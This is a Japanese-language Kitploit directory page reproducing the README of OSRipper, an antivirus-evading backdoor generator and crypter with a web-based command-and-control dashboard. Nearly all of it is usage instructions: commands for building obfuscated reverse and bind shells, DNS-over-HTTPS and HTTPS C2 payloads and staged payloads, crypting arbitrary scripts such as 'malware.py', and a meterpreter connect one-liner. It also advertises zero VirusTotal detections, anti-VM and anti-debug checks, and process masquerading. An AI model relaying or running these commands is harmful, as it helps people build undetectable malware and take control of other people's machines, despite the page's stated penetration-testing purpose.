Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
OSRipper — AV回避クロスプラットフォームのバックドアおよび暗号化フレームワーク、統合された軽量WebUIを搭載 | Kitploit
ツール/GitHubGitHub/noahoksuz/osripper
エクスプロイトフレームワークペイロード生成IDS/IPS回避ポストエクスプロイトペネトレーションテストコマンド&コントロール学習と教育レッドチーミング
GitHubnoahoksuz/osripper

OSRipper

AV回避クロスプラットフォームのバックドアおよび暗号化フレームワーク、統合された軽量WebUIを搭載

リポジトリを見る
32850757ヶ月前Kitploit レビュー済み
ウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

OSRipper v0.4.2

OSRipper Logo

CodeFactor Python Version License Platform

高度なクロスプラットフォームペイロード生成・暗号化ツール(FUD対応)

機能 • クイックスタート • Web UI • ペイロードタイプ • ドキュメント


概要

OSRipper は、許可されたペネトレーションテストやレッドチームオペレーション向けに設計された、洗練された完全検出回避(FUD)バックドア生成・暗号化ツールです。高度な回避技術、複数のペイロードタイプ、そして最新の Web ベース C2 インターフェースを備え、感染システムの管理を行います。

主な特長

  • 完全検出回避(FUD) - 高度な回避技術で最新の AV ソリューションを回避
  • Web ベース C2 インターフェース - アクティブセッションを管理するモダンなダッシュボード
  • 複数のペイロードタイプ - バインドシェル、リバースシェル、DoH C2、HTTPS C2 など
  • 多層難読化 - ランダム変数による標準・強化難読化
  • バイナリコンパイル - ペイロードをスタンドアロン実行可能ファイルにコンパイル
  • 暗号化通信 - SSL/TLS および証明書ピン留め HTTPS C2 チャネル
  • ステルス機能 - VM 検出、アンチデバッグ、プロセス偽装

機能

ペイロード生成

ペイロードタイプ説明ユースケース
バインドシェル被害マシン上でポートを開放リバース接続がブロックされている場合の直接アクセス
リバース TCP MeterpreterSSL/TLS 暗号化リバース接続標準的なペネトレーションテスト
DNS-over-HTTPS C2DoH ベースのステルス C2 通信ネットワーク制限の回避
HTTPS C2証明書ピン留め HTTPS C2安全で認証済みの C2 チャネル
ステージドペイロード多段階 Web 配信ステルス性を高めた展開
カスタムコード暗号化任意の Python スクリプトの難読化カスタムペイロードの暗号化

回避技術

  • 高度難読化 - ランダム変数を用いた多層コードエンコーディング
  • 強化難読化 - アンチデバッグ、VM 検出、ジャンクコード注入
  • アンチ VM 検出 - サンドボックスおよび仮想マシン回避
  • ステルス遅延 - ランダムな起動遅延(5~15 秒)
  • プロセス偽装 - 正規のシステムプロセスへの偽装
  • シグネチャランダマイゼーション - 毎回ユニークなペイロード生成

Web UI 機能

  • セッションダッシュボード - すべてのアクティブ C2 セッションの表示
  • インタラクティブターミナル - Web インターフェース経由でのコマンド実行
  • ペイロードジェネレーター - Web UI から直接ペイロードを生成
  • セッション管理 - システム情報表示、コマンド履歴、セッション管理
  • リアルタイム更新 - ライブコマンド実行と応答表示

高度な機能

  • Ngrok 統合 - 動的 IP のための自動トンネル作成
  • 証明書ピン留め - 証明書検証による安全な HTTPS C2
  • セッション永続化 - 再起動後も接続を維持
  • コマンドキューイング - オフラインエージェントへのコマンドキュー
  • 応答解析 - コマンド出力の自動解析

クイックスタート

インストール

# リポジトリのクローン
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# 依存関係のインストール
pip3 install -r requirements.txt

# パッケージのインストール
pip3 install -e .

重要 — オプション機能(ngrok、バイナリコンパイル)を使用するためのセットアップ:
多くのシステム(特に外部管理 Python 環境の Linux)では、OSRipper 独自の venv にオプション依存関係をインストールするために、ビルトインセットアップを 必ず 実行する必要があります。インストール後に一度だけ実行してください。

osripper-cli setup

これにより ~/.local/share/osripper/venv が作成され、pyngrok、nuitka、sandboxed がインストールされます。以降の osripper / osripper-cli の実行では自動的にこれらが使用されます。これを実行しない場合、--ngrok や --compile を使用するたびにセットアップを促すプロンプトが表示されます。システム全体またはユーザー pip インストールを希望する場合は、osripper-cli setup --system を使用してください。

基本的な使い方

対話モード:

osripper
# または
python3 -m osripper

コマンドライン:

# リバースシェルの生成
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# DoH C2 ペイロードの生成
osripper-cli doh -d example.com --obfuscate --compile

Web UI:

# Web UI 付き C2 サーバーの起動
python -m osripper.c2.server example.com --port 5000

# ダッシュボードにアクセス http://localhost:5000

Web UI

OSRipper には、感染システムを管理するためのモダンな Web ベース C2 インターフェースが含まれています。

機能

  • ダッシュボード - すべてのアクティブセッションの概要
  • セッション管理 - システム情報の表示とコマンド実行
  • ペイロードジェネレーター - Web インターフェース経由で DoH および HTTPS ペイロードを生成
  • コマンド履歴 - 実行されたすべてのコマンドと応答を追跡
  • リアルタイム更新 - ライブコマンド実行と応答表示

C2 サーバーの起動

# 基本的な使い方
python -m osripper.c2.server example.com

# HTTPS 使用
python -m osripper.c2.server example.com --https

# カスタムポート
python -m osripper.c2.server example.com --port 8080

# カスタム証明書使用
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

Web UI へのアクセス

サーバー起動後、以下の URL でダッシュボードにアクセスできます。

  • HTTP: http://localhost:5000
  • HTTPS: https://localhost:5000(有効な場合)

ペイロードタイプ

1. バインドシェルバックドア

被害マシン上でポートを開放し、接続を待ち受けます。

osripper-cli bind -p 4444 --obfuscate --compile

接続:

msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. リバース TCP Meterpreter

SSL/TLS で暗号化されたリバース接続。

osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DNS-over-HTTPS C2

DNS-over-HTTPS プロトコルを使用したステルス C2 チャネル。多くのネットワーク制限を回避します。

# ペイロード生成
osripper-cli doh -d example.com --obfuscate --compile

# C2 サーバー起動
python -m osripper.c2.server example.com

機能:

  • DNS ベースのステルス通信
  • セッション管理用 Web UI
  • 自動セッション永続化
  • オフラインエージェント用コマンドキューイング

4. HTTPS C2(証明書ピン留め)

認証用に証明書ピン留めを使用した安全な HTTPS C2。

# ペイロード生成(Web UI または CLI 経由)
# HTTPS で C2 サーバー起動
python -m osripper.c2.server example.com --https

# 証明書フィンガープリントの取得
curl http://localhost:5000/api/cert-fingerprint

機能:

  • セキュリティのための証明書ピン留め
  • 暗号化 HTTPS 通信
  • Web UI 統合
  • セッション管理

5. ステージドペイロード

多段階 Web 配信によるステルス性の向上。

osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate

6. カスタムコード暗号化

任意の Python スクリプトを難読化・暗号化します。

osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

コマンドラインインターフェース

共通オプション

オプション説明
--obfuscate多層難読化を有効化
--enhanced強化難読化(アンチデバッグ、VM 検出)
--compileスタンドアロンバイナリにコンパイル
--icon PATHコンパイル済みバイナリ用のカスタムアイコン
--delayランダムな起動遅延を追加(5~15 秒)
--output, -o NAME出力ファイル名
--quiet, -qサイレントモード(最小限の出力)

例

# フル機能のリバースシェル
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate --enhanced --compile --icon app.ico --delay

# 全機能を備えた DoH C2
osripper-cli doh -d example.com \
  --obfuscate --enhanced --compile --delay

# カスタムスクリプトの暗号化
osripper-cli custom --script malware.py \
  --obfuscate --enhanced --compile

# ngrok を使用した動的 IP
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

検出結果

最新の VirusTotal スキャン

  • Python ペイロード: 0/68 検出率
  • コンパイル済みバイナリ: 0/68 検出率

antiscan 結果

Antiscan Results


アーキテクチャ

┌─────────────────┐
│   Generated     │
│    Binary       │
└─────────────────┘
         │
         │ Execute
         ▼
┌──────────────────┐
│ Obfuscated       │
│ Dropper          │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│   C2 SERVER     │
│   (Web UI)      │
│                 │
└─────────────────┘
         │
         │ Command/Response
         ▼
┌─────────────────┐
│   Agent         │
│   Execution     │
└─────────────────┘

スクリーンショット

メインインターフェース

Web UI ダッシュボード

Web UI Dashboard


高度な設定

Ngrok 統合

# ngrok を使用したペイロード生成
osripper-cli reverse --ngrok -p 4444

# プロンプトに従ってトンネルを設定
# 実行: ngrok tcp 4444

カスタムアイコン

osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --compile --icon /path/to/icon.ico

難読化レベル

標準難読化:

  • 多層エンコーディング
  • 変数ランダマイゼーション
  • コード構造の難読化

強化難読化:

  • 標準機能すべて
  • アンチデバッグ技術
  • VM 検出
  • ジャンクコード注入
  • 高度な回避
# 標準
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate

# 強化
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced

HTTPS C2 のセットアップ

# 1. HTTPS で C2 サーバーを起動
python -m osripper.c2.server example.com --https
ツールをダウンロード